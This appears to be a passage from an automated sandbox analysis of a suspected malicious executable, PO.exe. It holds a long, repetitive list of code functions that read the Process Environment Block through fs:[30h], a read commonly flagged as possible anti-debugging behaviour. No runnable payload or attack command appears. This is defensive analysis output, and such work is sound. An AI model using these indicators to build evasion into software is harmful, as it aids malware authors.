Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00ACB8D0 mov ecx, dword ptr fs:[00000030h]	1_2_00ACB8D0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]	1_2_00ACB8D0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]	1_2_00ACB8D0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]	1_2_00ACB8D0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]	1_2_00ACB8D0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6002D mov eax, dword ptr fs:[00000030h]	1_2_00A6002D
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6002D mov eax, dword ptr fs:[00000030h]	1_2_00A6002D
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6002D mov eax, dword ptr fs:[00000030h]	1_2_00A6002D
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6002D mov eax, dword ptr fs:[00000030h]	1_2_00A6002D
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6002D mov eax, dword ptr fs:[00000030h]	1_2_00A6002D
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A4B02A mov eax, dword ptr fs:[00000030h]	1_2_00A4B02A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A4B02A mov eax, dword ptr fs:[00000030h]	1_2_00A4B02A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A4B02A mov eax, dword ptr fs:[00000030h]	1_2_00A4B02A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A4B02A mov eax, dword ptr fs:[00000030h]	1_2_00A4B02A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B04015 mov eax, dword ptr fs:[00000030h]	1_2_00B04015
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B04015 mov eax, dword ptr fs:[00000030h]	1_2_00B04015
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB7016 mov eax, dword ptr fs:[00000030h]	1_2_00AB7016
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB7016 mov eax, dword ptr fs:[00000030h]	1_2_00AB7016
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB7016 mov eax, dword ptr fs:[00000030h]	1_2_00AB7016
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B01074 mov eax, dword ptr fs:[00000030h]	1_2_00B01074
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF2073 mov eax, dword ptr fs:[00000030h]	1_2_00AF2073
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A50050 mov eax, dword ptr fs:[00000030h]	1_2_00A50050
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A50050 mov eax, dword ptr fs:[00000030h]	1_2_00A50050
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A661A0 mov eax, dword ptr fs:[00000030h]	1_2_00A661A0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A661A0 mov eax, dword ptr fs:[00000030h]	1_2_00A661A0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF49A4 mov eax, dword ptr fs:[00000030h]	1_2_00AF49A4
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF49A4 mov eax, dword ptr fs:[00000030h]	1_2_00AF49A4
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF49A4 mov eax, dword ptr fs:[00000030h]	1_2_00AF49A4
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF49A4 mov eax, dword ptr fs:[00000030h]	1_2_00AF49A4
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB69A6 mov eax, dword ptr fs:[00000030h]	1_2_00AB69A6
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB51BE mov eax, dword ptr fs:[00000030h]	1_2_00AB51BE
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB51BE mov eax, dword ptr fs:[00000030h]	1_2_00AB51BE
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB51BE mov eax, dword ptr fs:[00000030h]	1_2_00AB51BE
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB51BE mov eax, dword ptr fs:[00000030h]	1_2_00AB51BE
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6A185 mov eax, dword ptr fs:[00000030h]	1_2_00A6A185
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A5C182 mov eax, dword ptr fs:[00000030h]	1_2_00A5C182
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A62990 mov eax, dword ptr fs:[00000030h]	1_2_00A62990
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A3B1E1 mov eax, dword ptr fs:[00000030h]	1_2_00A3B1E1
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A3B1E1 mov eax, dword ptr fs:[00000030h]	1_2_00A3B1E1
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A3B1E1 mov eax, dword ptr fs:[00000030h]	1_2_00A3B1E1
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AC41E8 mov eax, dword ptr fs:[00000030h]	1_2_00AC41E8
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A54120 mov eax, dword ptr fs:[00000030h]	1_2_00A54120
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A54120 mov eax, dword ptr fs:[00000030h]	1_2_00A54120
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A54120 mov eax, dword ptr fs:[00000030h]	1_2_00A54120
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A54120 mov eax, dword ptr fs:[00000030h]	1_2_00A54120
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A54120 mov ecx, dword ptr fs:[00000030h]	1_2_00A54120
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6513A mov eax, dword ptr fs:[00000030h]	1_2_00A6513A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6513A mov eax, dword ptr fs:[00000030h]	1_2_00A6513A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A39100 mov eax, dword ptr fs:[00000030h]	1_2_00A39100
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A39100 mov eax, dword ptr fs:[00000030h]	1_2_00A39100
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A39100 mov eax, dword ptr fs:[00000030h]	1_2_00A39100
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A3C962 mov eax, dword ptr fs:[00000030h]	1_2_00A3C962
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A3B171 mov eax, dword ptr fs:[00000030h]	1_2_00A3B171
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A3B171 mov eax, dword ptr fs:[00000030h]	1_2_00A3B171
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A5B944 mov eax, dword ptr fs:[00000030h]	1_2_00A5B944
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A5B944 mov eax, dword ptr fs:[00000030h]	1_2_00A5B944
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A352A5 mov eax, dword ptr fs:[00000030h]	1_2_00A352A5
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A352A5 mov eax, dword ptr fs:[00000030h]	1_2_00A352A5
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A352A5 mov eax, dword ptr fs:[00000030h]	1_2_00A352A5
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A352A5 mov eax, dword ptr fs:[00000030h]	1_2_00A352A5
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A352A5 mov eax, dword ptr fs:[00000030h]	1_2_00A352A5
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A4AAB0 mov eax, dword ptr fs:[00000030h]	1_2_00A4AAB0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A4AAB0 mov eax, dword ptr fs:[00000030h]	1_2_00A4AAB0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6FAB0 mov eax, dword ptr fs:[00000030h]	1_2_00A6FAB0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6D294 mov eax, dword ptr fs:[00000030h]	1_2_00A6D294
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6D294 mov eax, dword ptr fs:[00000030h]	1_2_00A6D294
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A62AE4 mov eax, dword ptr fs:[00000030h]	1_2_00A62AE4
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A62ACB mov eax, dword ptr fs:[00000030h]	1_2_00A62ACB
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A74A2C mov eax, dword ptr fs:[00000030h]	1_2_00A74A2C
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A74A2C mov eax, dword ptr fs:[00000030h]	1_2_00A74A2C
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A48A0A mov eax, dword ptr fs:[00000030h]	1_2_00A48A0A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A35210 mov eax, dword ptr fs:[00000030h]	1_2_00A35210
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A35210 mov ecx, dword ptr fs:[00000030h]	1_2_00A35210
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A35210 mov eax, dword ptr fs:[00000030h]	1_2_00A35210
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A35210 mov eax, dword ptr fs:[00000030h]	1_2_00A35210
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A3AA16 mov eax, dword ptr fs:[00000030h]	1_2_00A3AA16
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A3AA16 mov eax, dword ptr fs:[00000030h]	1_2_00A3AA16
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A53A1C mov eax, dword ptr fs:[00000030h]	1_2_00A53A1C
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AFAA16 mov eax, dword ptr fs:[00000030h]	1_2_00AFAA16
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AFAA16 mov eax, dword ptr fs:[00000030h]	1_2_00AFAA16
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AEB260 mov eax, dword ptr fs:[00000030h]	1_2_00AEB260
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AEB260 mov eax, dword ptr fs:[00000030h]	1_2_00AEB260
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B08A62 mov eax, dword ptr fs:[00000030h]	1_2_00B08A62
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A7927A mov eax, dword ptr fs:[00000030h]	1_2_00A7927A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A39240 mov eax, dword ptr fs:[00000030h]	1_2_00A39240
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A39240 mov eax, dword ptr fs:[00000030h]	1_2_00A39240
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A39240 mov eax, dword ptr fs:[00000030h]	1_2_00A39240
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A39240 mov eax, dword ptr fs:[00000030h]	1_2_00A39240
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AFEA55 mov eax, dword ptr fs:[00000030h]	1_2_00AFEA55
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AC4257 mov eax, dword ptr fs:[00000030h]	1_2_00AC4257
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A64BAD mov eax, dword ptr fs:[00000030h]	1_2_00A64BAD
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A64BAD mov eax, dword ptr fs:[00000030h]	1_2_00A64BAD
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A64BAD mov eax, dword ptr fs:[00000030h]	1_2_00A64BAD
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B05BA5 mov eax, dword ptr fs:[00000030h]	1_2_00B05BA5
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF138A mov eax, dword ptr fs:[00000030h]	1_2_00AF138A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A41B8F mov eax, dword ptr fs:[00000030h]	1_2_00A41B8F
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A41B8F mov eax, dword ptr fs:[00000030h]	1_2_00A41B8F
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AED380 mov ecx, dword ptr fs:[00000030h]	1_2_00AED380
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A62397 mov eax, dword ptr fs:[00000030h]	1_2_00A62397
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6B390 mov eax, dword ptr fs:[00000030h]	1_2_00A6B390
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]	1_2_00A603E2
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]	1_2_00A603E2
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]	1_2_00A603E2
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]	1_2_00A603E2
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]	1_2_00A603E2
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]	1_2_00A603E2
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A5DBE9 mov eax, dword ptr fs:[00000030h]	1_2_00A5DBE9
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB53CA mov eax, dword ptr fs:[00000030h]	1_2_00AB53CA
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB53CA mov eax, dword ptr fs:[00000030h]	1_2_00AB53CA
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF131B mov eax, dword ptr fs:[00000030h]	1_2_00AF131B
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A3DB60 mov ecx, dword ptr fs:[00000030h]	1_2_00A3DB60
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A63B7A mov eax, dword ptr fs:[00000030h]	1_2_00A63B7A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A63B7A mov eax, dword ptr fs:[00000030h]	1_2_00A63B7A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A3DB40 mov eax, dword ptr fs:[00000030h]	1_2_00A3DB40
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B08B58 mov eax, dword ptr fs:[00000030h]	1_2_00B08B58
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A3F358 mov eax, dword ptr fs:[00000030h]	1_2_00A3F358
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A4849B mov eax, dword ptr fs:[00000030h]	1_2_00A4849B
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF14FB mov eax, dword ptr fs:[00000030h]	1_2_00AF14FB
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB6CF0 mov eax, dword ptr fs:[00000030h]	1_2_00AB6CF0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB6CF0 mov eax, dword ptr fs:[00000030h]	1_2_00AB6CF0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB6CF0 mov eax, dword ptr fs:[00000030h]	1_2_00AB6CF0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B08CD6 mov eax, dword ptr fs:[00000030h]	1_2_00B08CD6
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6BC2C mov eax, dword ptr fs:[00000030h]	1_2_00A6BC2C
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB6C0A mov eax, dword ptr fs:[00000030h]	1_2_00AB6C0A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB6C0A mov eax, dword ptr fs:[00000030h]	1_2_00AB6C0A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB6C0A mov eax, dword ptr fs:[00000030h]	1_2_00AB6C0A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB6C0A mov eax, dword ptr fs:[00000030h]	1_2_00AB6C0A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]	1_2_00AF1C06
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]	1_2_00AF1C06
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]	1_2_00AF1C06
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]	1_2_00AF1C06
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]	1_2_00AF1C06
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]	1_2_00AF1C06
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]	1_2_00AF1C06
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]	1_2_00AF1C06
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]	1_2_00AF1C06
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]	1_2_00AF1C06
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]	1_2_00AF1C06
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]	1_2_00AF1C06
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]	1_2_00AF1C06
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]	1_2_00AF1C06
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B0740D mov eax, dword ptr fs:[00000030h]	1_2_00B0740D
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B0740D mov eax, dword ptr fs:[00000030h]	1_2_00B0740D
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B0740D mov eax, dword ptr fs:[00000030h]	1_2_00B0740D
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A5746D mov eax, dword ptr fs:[00000030h]	1_2_00A5746D
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6A44B mov eax, dword ptr fs:[00000030h]	1_2_00A6A44B
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00ACC450 mov eax, dword ptr fs:[00000030h]	1_2_00ACC450
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00ACC450 mov eax, dword ptr fs:[00000030h]	1_2_00ACC450
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A635A1 mov eax, dword ptr fs:[00000030h]	1_2_00A635A1
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A61DB5 mov eax, dword ptr fs:[00000030h]	1_2_00A61DB5
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A61DB5 mov eax, dword ptr fs:[00000030h]	1_2_00A61DB5
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A61DB5 mov eax, dword ptr fs:[00000030h]	1_2_00A61DB5
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B005AC mov eax, dword ptr fs:[00000030h]	1_2_00B005AC
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B005AC mov eax, dword ptr fs:[00000030h]	1_2_00B005AC
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A62581 mov eax, dword ptr fs:[00000030h]	1_2_00A62581
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A62581 mov eax, dword ptr fs:[00000030h]	1_2_00A62581
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A62581 mov eax, dword ptr fs:[00000030h]	1_2_00A62581
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A62581 mov eax, dword ptr fs:[00000030h]	1_2_00A62581
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]	1_2_00A32D8A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]	1_2_00A32D8A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]	1_2_00A32D8A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]	1_2_00A32D8A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]	1_2_00A32D8A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6FD9B mov eax, dword ptr fs:[00000030h]	1_2_00A6FD9B
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6FD9B mov eax, dword ptr fs:[00000030h]	1_2_00A6FD9B
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A4D5E0 mov eax, dword ptr fs:[00000030h]	1_2_00A4D5E0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A4D5E0 mov eax, dword ptr fs:[00000030h]	1_2_00A4D5E0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]	1_2_00AFFDE2
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]	1_2_00AFFDE2
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]	1_2_00AFFDE2
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]	1_2_00AFFDE2
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AE8DF1 mov eax, dword ptr fs:[00000030h]	1_2_00AE8DF1
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]	1_2_00AB6DC9
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]	1_2_00AB6DC9
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]	1_2_00AB6DC9
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB6DC9 mov ecx, dword ptr fs:[00000030h]	1_2_00AB6DC9
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]	1_2_00AB6DC9
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]	1_2_00AB6DC9
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B08D34 mov eax, dword ptr fs:[00000030h]	1_2_00B08D34
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]	1_2_00A43D34
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]	1_2_00A43D34
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]	1_2_00A43D34
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]	1_2_00A43D34
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]	1_2_00A43D34
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]	1_2_00A43D34
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]	1_2_00A43D34
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]	1_2_00A43D34
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]	1_2_00A43D34
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]	1_2_00A43D34
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]	1_2_00A43D34
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]	1_2_00A43D34
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]	1_2_00A43D34
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A3AD30 mov eax, dword ptr fs:[00000030h]	1_2_00A3AD30
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AFE539 mov eax, dword ptr fs:[00000030h]	1_2_00AFE539
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00ABA537 mov eax, dword ptr fs:[00000030h]	1_2_00ABA537
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A64D3B mov eax, dword ptr fs:[00000030h]	1_2_00A64D3B
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A64D3B mov eax, dword ptr fs:[00000030h]	1_2_00A64D3B
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A64D3B mov eax, dword ptr fs:[00000030h]	1_2_00A64D3B
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A5C577 mov eax, dword ptr fs:[00000030h]	1_2_00A5C577
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A5C577 mov eax, dword ptr fs:[00000030h]	1_2_00A5C577
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A73D43 mov eax, dword ptr fs:[00000030h]	1_2_00A73D43
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB3540 mov eax, dword ptr fs:[00000030h]	1_2_00AB3540
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AE3D40 mov eax, dword ptr fs:[00000030h]	1_2_00AE3D40
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A57D50 mov eax, dword ptr fs:[00000030h]	1_2_00A57D50
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB46A7 mov eax, dword ptr fs:[00000030h]	1_2_00AB46A7
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B00EA5 mov eax, dword ptr fs:[00000030h]	1_2_00B00EA5
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B00EA5 mov eax, dword ptr fs:[00000030h]	1_2_00B00EA5
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B00EA5 mov eax, dword ptr fs:[00000030h]	1_2_00B00EA5
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00ACFE87 mov eax, dword ptr fs:[00000030h]	1_2_00ACFE87
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A616E0 mov ecx, dword ptr fs:[00000030h]	1_2_00A616E0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A476E2 mov eax, dword ptr fs:[00000030h]	1_2_00A476E2
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A78EC7 mov eax, dword ptr fs:[00000030h]	1_2_00A78EC7
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B08ED6 mov eax, dword ptr fs:[00000030h]	1_2_00B08ED6
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A636CC mov eax, dword ptr fs:[00000030h]	1_2_00A636CC
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AEFEC0 mov eax, dword ptr fs:[00000030h]	1_2_00AEFEC0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A3E620 mov eax, dword ptr fs:[00000030h]	1_2_00A3E620
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AEFE3F mov eax, dword ptr fs:[00000030h]	1_2_00AEFE3F
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A3C600 mov eax, dword ptr fs:[00000030h]	1_2_00A3C600
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A3C600 mov eax, dword ptr fs:[00000030h]	1_2_00A3C600
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A3C600 mov eax, dword ptr fs:[00000030h]	1_2_00A3C600
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A68E00 mov eax, dword ptr fs:[00000030h]	1_2_00A68E00
